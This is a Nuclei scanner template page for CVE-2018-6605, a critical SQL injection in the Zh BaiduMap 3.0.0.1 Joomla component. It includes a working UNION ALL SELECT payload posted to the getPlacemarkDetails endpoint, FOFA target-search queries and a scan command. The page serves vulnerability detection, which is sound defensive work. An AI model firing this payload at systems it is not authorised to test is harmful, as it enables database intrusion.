Skip to content
Nuclei Templates

Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection

ID: CVE-2018-6605

Severity: critical

Author: DhiyaneshDk

Tags: cve,cve2018,joomla,sqli,joomla\!,zh_baidumap_project

Description

Section titled “Description”

SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.

YAML Source

Section titled “YAML Source”
id: CVE-2018-6605


info:
  name: Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.
  reference:
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/C0reL0ader/EaST/blob/master/exploits/efa_joomla_zh_baidumap_sqli.py
    - https://www.exploit-db.com/exploits/43974
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-6605
    cwe-id: CWE-89
    epss-score: 0.00282
    epss-percentile: 0.67968
    cpe: cpe:2.3:a:zh_baidumap_project:zh_baidumap:3.0.0.1:*:*:*:*:joomla\!:*:*
  metadata:
    max-request: 1
    vendor: zh_baidumap_project
    product: zh_baidumap
    framework: joomla\!
    fofa-query:
      - app="Joomla!-网站安装"
      - app="joomla!-网站安装"
  tags: cve,cve2018,joomla,sqli,joomla\!,zh_baidumap_project
variables:
  num: "{{rand_int(2000000000, 2100000000)}}"


http:
  - method: POST
    path:
      - "{{BaseURL}}/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails"


    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+"


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "{{md5(num)}}"
          - "dataexists"
        part: body


      - type: status
        status:
          - 200
# digest: 490a004630440220249ea46fdcd0d2c0df2e89d70b46a6918a144ac1c0347832e78321af7d15a6e402206b453c716c08d3631be558118f11f34ae09fa23e3c7c8e9388cb540748b139cf:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-6605.yaml"

View on Github